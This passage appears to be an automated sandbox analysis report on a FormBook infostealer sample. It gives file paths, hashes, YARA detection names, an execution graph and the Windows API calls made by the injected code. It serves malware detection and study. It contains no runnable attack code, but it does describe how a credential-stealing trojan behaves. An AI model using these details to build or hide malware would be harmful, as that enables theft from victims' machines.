                                                                  Path:C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exe"
                                                                  Imagebase:0xbb0000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3563473884.0000000005600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3563473884.0000000005600000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:8
                                                                  Start time:08:18:28
                                                                  Start date:08/10/2024
                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                  Imagebase:0x7ff6bf500000
                                                                  File size:676'768 bytes
                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:1.2%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:14.2%
                                                                    Total number of Nodes:134
                                                                    Total number of Limit Nodes:13
                                                                    execution_graph 88248 24348e3 88249 24348ff 88248->88249 88250 2434927 88249->88250 88251 243493b 88249->88251 88252 243c533 NtClose 88250->88252 88258 243c533 88251->88258 88254 2434930 88252->88254 88255 2434944 88261 243e6f3 RtlAllocateHeap 88255->88261 88257 243494f 88259 243c550 88258->88259 88260 243c561 NtClose 88259->88260 88260->88255 88261->88257 88352 2434c73 88354 2434c8c 88352->88354 88353 2434cd7 88355 243e5d3 RtlFreeHeap 88353->88355 88354->88353 88357 2434d14 88354->88357 88359 2434d19 88354->88359 88356 2434ce4 88355->88356 88358 243e5d3 RtlFreeHeap 88357->88358 88358->88359 88360 243bb13 88361 243bb2d 88360->88361 88364 2e72df0 LdrInitializeThunk 88361->88364 88362 243bb55 88364->88362 88365 243f7f3 88366 243e5d3 RtlFreeHeap 88365->88366 88367 243f808 88366->88367 88368 243e6b3 88371 243c843 88368->88371 88370 243e6ce 88372 243c85d 88371->88372 88373 243c86e RtlAllocateHeap 88372->88373 88373->88370 88374 2424033 88375 242404d 88374->88375 88380 24277c3 88375->88380 88377 242406b 88378 242409f PostThreadMessageW 88377->88378 88379 24240b0 88377->88379 88378->88379 88382 24277e7 88380->88382 88381 24277ee 88381->88377 88382->88381 88383 242780d 88382->88383 88387 243fb73 LdrLoadDll 88382->88387 88385 2427823 LdrLoadDll 88383->88385 88386 242783a 88383->88386 88385->88386 88386->88377 88387->88383 88388 242b2d3 88389 242b317 88388->88389 88390 242b338 88389->88390 88391 243c533 NtClose 88389->88391 88391->88390 88392 242e4d3 88393 242e4f9 88392->88393 88399 242e5f9 88393->88399 88401 243f833 RtlAllocateHeap RtlFreeHeap 88393->88401 88395 242e58e 88396 242e5f0 88395->88396 88397 243bb63 LdrInitializeThunk 88395->88397 88395->88399 88396->88399 88402 24388d3 88396->88402 88397->88396 88400 242e6a5 88401->88395 88403 2438938 88402->88403 88404 2438973 88403->88404 88407 2428b73 88403->88407 88404->88400 88406 2438955 88406->88400 88408 2428b8e 88407->88408 88409 2428b36 88407->88409 88408->88406 88410 243c8e3 ExitProcess 88409->88410 88411 2428b5b 88410->88411 88411->88406 88262 2e72b60 LdrInitializeThunk 88263 2411969 88264 2411927 88263->88264 88264->88263 88267 243fc63 88264->88267 88270 243e183 88267->88270 88271 243e1a9 88270->88271 88282 24173b3 88271->88282 88273 243e1bf 88281 24119f7 88273->88281 88285 242b0e3 88273->88285 88275 243e1de 88278 243e1f3 88275->88278 88300 243c8e3 88275->88300 88296 24381e3 88278->88296 88279 243e20d 88280 243c8e3 ExitProcess 88279->88280 88280->88281 88284 24173c0 88282->88284 88303 2426483 88282->88303 88284->88273 88286 242b10f 88285->88286 88327 242afd3 88286->88327 88289 242b154 88292 242b170 88289->88292 88294 243c533 NtClose 88289->88294 88290 242b13c 88291 242b147 88290->88291 88293 243c533 NtClose 88290->88293 88291->88275 88292->88275 88293->88291 88295 242b166 88294->88295 88295->88275 88297 2438245 88296->88297 88299 2438252 88297->88299 88338 2428623 88297->88338 88299->88279 88301 243c8fd 88300->88301 88302 243c90e ExitProcess 88301->88302 88302->88278 88304 24264a0 88303->88304 88306 24264b9 88304->88306 88307 243cf83 88304->88307 88306->88284 88309 243cf9d 88307->88309 88308 243cfcc 88308->88306 88309->88308 88314 243bb63 88309->88314 88315 243bb7d 88314->88315 88321 2e72c0a 88315->88321 88316 243bba9 88318 243e5d3 88316->88318 88324 243c893 88318->88324 88320 243d042 88320->88306 88322 2e72c11 88321->88322 88323 2e72c1f LdrInitializeThunk 88321->88323 88322->88316 88323->88316 88325 243c8ad 88324->88325 88326 243c8be RtlFreeHeap 88325->88326 88326->88320 88328 242afed 88327->88328 88332 242b0c9 88327->88332 88333 243bc03 88328->88333 88331 243c533 NtClose 88331->88332 88332->88289 88332->88290 88334 243bc20 88333->88334 88337 2e735c0 LdrInitializeThunk 88334->88337 88335 242b0bd 88335->88331 88337->88335 88339 242862d 88338->88339 88345 2428b5b 88339->88345 88346 2423cb3 88339->88346 88341 242877a 88342 243e5d3 RtlFreeHeap 88341->88342 88341->88345 88343 2428792 88342->88343 88344 243c8e3 ExitProcess 88343->88344 88343->88345 88344->88345 88345->88299 88350 2423cd3 88346->88350 88348 2423d3c 88348->88341 88349 2423d32 88349->88341 88350->88348 88351 242b3f3 RtlFreeHeap LdrInitializeThunk 88350->88351 88351->88349 88412 2428d78 88413 243c533 NtClose 88412->88413 88414 2428d82 88413->88414

                                                                    Executed Functions

                                                                    Function 024277C3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 133 24277c3-24277ec call 243f2d3 136 24277f2-2427800 call 243f8d3 133->136 137 24277ee-24277f1 133->137 140 2427802-242780d call 243fb73 136->140 141 2427810-2427821 call 243dc53 136->141 140->141 146 2427823-2427837 LdrLoadDll 141->146 147 242783a-242783d 141->147 146->147
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02427835
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 5ef096c8c7a1e93c2715944f6dd01e06b1f1e1557ddf92f29a19b760ffd8ce82
                                                                    • Instruction ID: 232fec595a86fca2a3673ab2a5d4ca5fc25ab67a665179f6df25ec1d63384a68
                                                                    • Opcode Fuzzy Hash: 5ef096c8c7a1e93c2715944f6dd01e06b1f1e1557ddf92f29a19b760ffd8ce82
                                                                    • Instruction Fuzzy Hash: 42011EB5D0020DABDB10DBE5DC41F9EB379AB54308F0081AAE90897280F671EB18CB91
                                                                    Function 0243C533 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 177 243c533-243c56f call 24147a3 call 243d763 NtClose
                                                                    APIs
                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0243C56A
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 1f6b16b50c1623c80d6a4ebea6231e5f0da945ed92dd2bcb1851470dc9f5c42f
                                                                    • Instruction ID: ab7248dcc21d524604f3f0df17e594db55529ad06689595a8fc0bb25015deed7
                                                                    • Opcode Fuzzy Hash: 1f6b16b50c1623c80d6a4ebea6231e5f0da945ed92dd2bcb1851470dc9f5c42f
                                                                    • Instruction Fuzzy Hash: 54E04F366006187BD120BA5ADD41F97776DDFC5714F004019FA18A7140C6B079048BE1
                                                                    Function 02E72B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d7c6cf7c4ec166a72fcf2c08bf7379d9e2dc579b535546d6f8ee88d5c4f0d254
                                                                    • Instruction ID: 877f14bf23231755c36e84c240eca56d54d4acbab83e05316008c0440b77771c
                                                                    • Opcode Fuzzy Hash: d7c6cf7c4ec166a72fcf2c08bf7379d9e2dc579b535546d6f8ee88d5c4f0d254
                                                                    • Instruction Fuzzy Hash: 98900271242404034545B1584455617400B87E0301B95D061E5494594DC5358991A125
                                                                    Function 02E72DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8946b5e0ee591a2a6b1a6a3ad853fa554afafc4d7713660a3ea63f0546ee3827
                                                                    • Instruction ID: e7e10466e80d53eb126cf34871d1713f9ea514e3773547997ae8f232cdf02f1d
                                                                    • Opcode Fuzzy Hash: 8946b5e0ee591a2a6b1a6a3ad853fa554afafc4d7713660a3ea63f0546ee3827
                                                                    • Instruction Fuzzy Hash: 9E90023124140813D551B1584545707000A87D0341FD5D452A48A455CD96668A52E121
                                                                    Function 02E735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3f5689d5568528678ff2772a83c4ae4a8c3050025cba5acf404892c604bd037a
                                                                    • Instruction ID: 0871efc07ce2b033aef9fdbc594b8c66fdaf44110e71d8f639ff775bee52563f
                                                                    • Opcode Fuzzy Hash: 3f5689d5568528678ff2772a83c4ae4a8c3050025cba5acf404892c604bd037a
                                                                    • Instruction Fuzzy Hash: EC90023164550802D540B1584555707100687D0301FA5D451A48A456CD87A58A51A5A2
                                                                    Function 02428623 Relevance: .4, Instructions: 436COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aacc94778e44a2c7bd02a21a044e5c3359a77f634a721a84d4dfdec1693611c3
                                                                    • Instruction ID: 4b64eabfb0fa4a6a2e13863f4b396f119538fe2bb7a5c2fbb354ec3dbbb5641e
                                                                    • Opcode Fuzzy Hash: aacc94778e44a2c7bd02a21a044e5c3359a77f634a721a84d4dfdec1693611c3
                                                                    • Instruction Fuzzy Hash: 98F1A271D0022AAFDB24CFA6CC84BAFB779AF44304F54819EE519A7241D7706A49CFA1
                                                                    Function 0242402C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(g6sPb5,00000111,00000000,00000000), ref: 024240AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: g6sPb5$g6sPb5
                                                                    • API String ID: 1836367815-4070624366
                                                                    • Opcode ID: bfa6c6c5b910c82b02fb46b5d848c27d68cd47ffac70c083faaa7ae8ce8155ef
                                                                    • Instruction ID: 22057f64bb5a4f7eeb1486d4ede9600aa13764d8e540010ad7997f2cf7119f32
                                                                    • Opcode Fuzzy Hash: bfa6c6c5b910c82b02fb46b5d848c27d68cd47ffac70c083faaa7ae8ce8155ef
                                                                    • Instruction Fuzzy Hash: 0601A571D0021C7AEB11A6E58C81EEFBB7CDF45798F448169FA14B7240D6645E068BE2
                                                                    Function 02424033 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(g6sPb5,00000111,00000000,00000000), ref: 024240AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: g6sPb5$g6sPb5
                                                                    • API String ID: 1836367815-4070624366
                                                                    • Opcode ID: 80500729ef6f262638a181bb610d6b5e47d5d4cc609269b6f3cbd2cf54943d2d
                                                                    • Instruction ID: 2e46f9ec8530796dcaadd3314c1c2ced07a188599a09674487e2d0dd739e261f
                                                                    • Opcode Fuzzy Hash: 80500729ef6f262638a181bb610d6b5e47d5d4cc609269b6f3cbd2cf54943d2d
                                                                    • Instruction Fuzzy Hash: FB01C472D0021C7AEB11A6E58C81EEFBB7CDF45698F448169FA14A7240D6745E0A8BE2
                                                                    Function 02427843 Relevance: 1.6, APIs: 1, Instructions: 74libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 118 2427843-2427867 120 2427869-2427877 118->120 121 242780c-2427813 118->121 124 2427884-2427912 120->124 125 2427879-242787e 120->125 122 2427819-2427821 121->122 123 2427814 call 243dc53 121->123 126 2427823-2427837 LdrLoadDll 122->126 127 242783a-242783d 122->127 123->122 129 2427914-242791a 124->129 130 242792f-2427933 124->130 125->124 126->127 131 242797b-242797e 129->131 132 242791c-2427921 129->132
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02427835
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 8f18771ff06d8c843c5382008cb27fdd5f1658f91d82d486f8d4e3dfc764fe64
                                                                    • Instruction ID: aea3e39e7e15afc0b9f490d4cd36831f95aa13ab037d8537c02b0abcfa4f84a3
                                                                    • Opcode Fuzzy Hash: 8f18771ff06d8c843c5382008cb27fdd5f1658f91d82d486f8d4e3dfc764fe64
                                                                    • Instruction Fuzzy Hash: 7C118972905129ABDB11CFAACCC1BA6F7A5EF05204F4041DAE84CCF205F634E51AC781
                                                                    Function 024277B7 Relevance: 1.5, APIs: 1, Instructions: 46libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 148 24277b7-24277bb 149 242780b-242780d 148->149 150 24277bd-24277c0 148->150 153 2427810-2427821 call 243dc53 149->153 151 24277c2-24277c4 150->151 152 24277c5-24277df 150->152 151->152 155 24277e7-24277ec 152->155 156 24277e2 call 243f2d3 152->156 160 2427823-2427837 LdrLoadDll 153->160 161 242783a-242783d 153->161 158 24277f2-2427800 call 243f8d3 155->158 159 24277ee-24277f1 155->159 156->155 158->153 164 2427802-242780d call 243fb73 158->164 160->161 164->153
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02427835
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: ea8b0b66425c5859dcf35716314d0d01e2c84b2ecff666065d518572ac6f59f2
                                                                    • Instruction ID: d1e99b12a7d19cea8de467aa0e90e4bab2a222e64bf75191907f444590cb002b
                                                                    • Opcode Fuzzy Hash: ea8b0b66425c5859dcf35716314d0d01e2c84b2ecff666065d518572ac6f59f2
                                                                    • Instruction Fuzzy Hash: 2901AC75D4020DABDF00DA95D841FEDB7749B48204F008195D91CD7240F2719A09CB91
                                                                    Function 0243C843 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 167 243c843-243c884 call 24147a3 call 243d763 RtlAllocateHeap
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(?,0242E58E,?,?,00000000,?,0242E58E,?,?,?), ref: 0243C87F
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 16a4f3bf96a57099fc5474b8d2edb50e7aa9a884e77a5b8bb9cc59858096214f
                                                                    • Instruction ID: 9b6300a001f442de4a9690d3bf107b58cc94a15a9fbc57c4f8a56740c02790a8
                                                                    • Opcode Fuzzy Hash: 16a4f3bf96a57099fc5474b8d2edb50e7aa9a884e77a5b8bb9cc59858096214f
                                                                    • Instruction Fuzzy Hash: 33E06D76600604BFD610EE9AEC84E9B77ADEFC9710F004019F918A7240D671B9108BB5
                                                                    Function 0243C893 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 172 243c893-243c8d4 call 24147a3 call 243d763 RtlFreeHeap
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,7473EC45,00000007,00000000,00000004,00000000,0242704C,000000F4), ref: 0243C8CF
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: 88da014f75d25587c892d55418ede5ee0777c14e268e76cdb20823696d9e434e
                                                                    • Instruction ID: d2d3e40f83654d3533f48eb8caeba64e9b53db87628c8db2b709183d5970560f
                                                                    • Opcode Fuzzy Hash: 88da014f75d25587c892d55418ede5ee0777c14e268e76cdb20823696d9e434e
                                                                    • Instruction Fuzzy Hash: 4DE06DB6600609BBD610EE99DC44E9B33ADEFC9710F004019F908A7241D670B9108AB5
                                                                    Function 0243C8E3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 182 243c8e3-243c91c call 24147a3 call 243d763 ExitProcess
                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,1A777905,?,?,1A777905), ref: 0243C917
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2147046823.0000000002410000.00000040.80000000.00040000.00000000.sdmp, Offset: 02410000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2410000_svchost.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: ec78b80b32e7219fb245775cf88c82d9812fcd126f57549b7c699f673255ac32
                                                                    • Instruction ID: 978fbc812de400992ce4fb49a26067e661d595ddfc4da816c17012e408f1e2d8
                                                                    • Opcode Fuzzy Hash: ec78b80b32e7219fb245775cf88c82d9812fcd126f57549b7c699f673255ac32
                                                                    • Instruction Fuzzy Hash: 8BE04F366006147BD110EB5ADC41F97776DDFC5710F00451AFA08A7244C67179118AB1
                                                                    Function 02E72C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 564ab4508f0142f8056a3ae3ac74fcc3d643861e184dd70ae444eb2fa6390f08
                                                                    • Instruction ID: 7d1ed4588080eb7725c4eca6e90640f20d5bb3284c9a405960a42779ec48885f
                                                                    • Opcode Fuzzy Hash: 564ab4508f0142f8056a3ae3ac74fcc3d643861e184dd70ae444eb2fa6390f08
                                                                    • Instruction Fuzzy Hash: 27B09B719415C5C5DE51F7604A09717790567D0705F55D061D7470645E4738C1D1F175

                                                                    Non-executed Functions

                                                                    Function 02EB2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-2160512332
                                                                    • Opcode ID: 2371700b5c1545f20fd5196aa1b9dab0777d37d5f9613346d179c9dc072266ef
                                                                    • Instruction ID: 03b83a44d7eefa6bf55b3245b0dbb06b31da802b795c93af175d81c80bb297ff
                                                                    • Opcode Fuzzy Hash: 2371700b5c1545f20fd5196aa1b9dab0777d37d5f9613346d179c9dc072266ef
                                                                    • Instruction Fuzzy Hash: 8F92CF716843419BE726DF24C880BABB7E9BF84758F04A92DFE94D7250D770E844CB92
                                                                    Function 02E268B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-3089669407
                                                                    • Opcode ID: 5cf369781a12301532567ed3f6b99430941648d6b3d065950d9c6ca8a9459641
                                                                    • Instruction ID: 1cc7c0b0f4de865739b329656d70c4bbbb85d9dd33004903b22d12d1fab025c9
                                                                    • Opcode Fuzzy Hash: 5cf369781a12301532567ed3f6b99430941648d6b3d065950d9c6ca8a9459641
                                                                    • Instruction Fuzzy Hash: 7E8165B2DC12186F9B11FAD4DDD4EEEB7BEEB04740B559921FA05F7100E620ED188BA0
                                                                    Function 02E68620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02EA54E2
                                                                    • double initialized or corrupted critical section, xrefs: 02EA5508
                                                                    • Address of the debug info found in the active list., xrefs: 02EA54AE, 02EA54FA
                                                                    • 8, xrefs: 02EA52E3
                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02EA54CE
                                                                    • Thread identifier, xrefs: 02EA553A
                                                                    • Critical section address., xrefs: 02EA5502
                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 02EA5543
                                                                    • Invalid debug info address of this critical section, xrefs: 02EA54B6
                                                                    • Critical section address, xrefs: 02EA5425, 02EA54BC, 02EA5534
                                                                    • undeleted critical section in freed memory, xrefs: 02EA542B
                                                                    • Critical section debug info address, xrefs: 02EA541F, 02EA552E
                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02EA540A, 02EA5496, 02EA5519
                                                                    • corrupted critical section, xrefs: 02EA54C2
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2155609002.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_2e00000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                    • API String ID: 0-2368682639
                                                                    • Opcode ID: 22da9a6014ffec8e94c20e7971a6b5bb3a02ee3645839ac78305a936138797fb
                                                                    • Instruction ID: bc24ec203a3421189c3bd7bd40918ee6e17e5e44e3629742eee083df68927030
                                                                    • Opcode Fuzzy Hash: 22da9a6014ffec8e94c20e7971a6b5bb3a02ee3645839ac78305a936138797fb
                                                                    • Instruction Fuzzy Hash: 6B818CB0E80358EFFB20CF94C845BAEBBB6EB48714F549169F506BB640D375A944CB60
                                                                    Function 02E629F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 02EA22E4
                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 02EA25EB
                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 02EA261F
                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 02EA2409
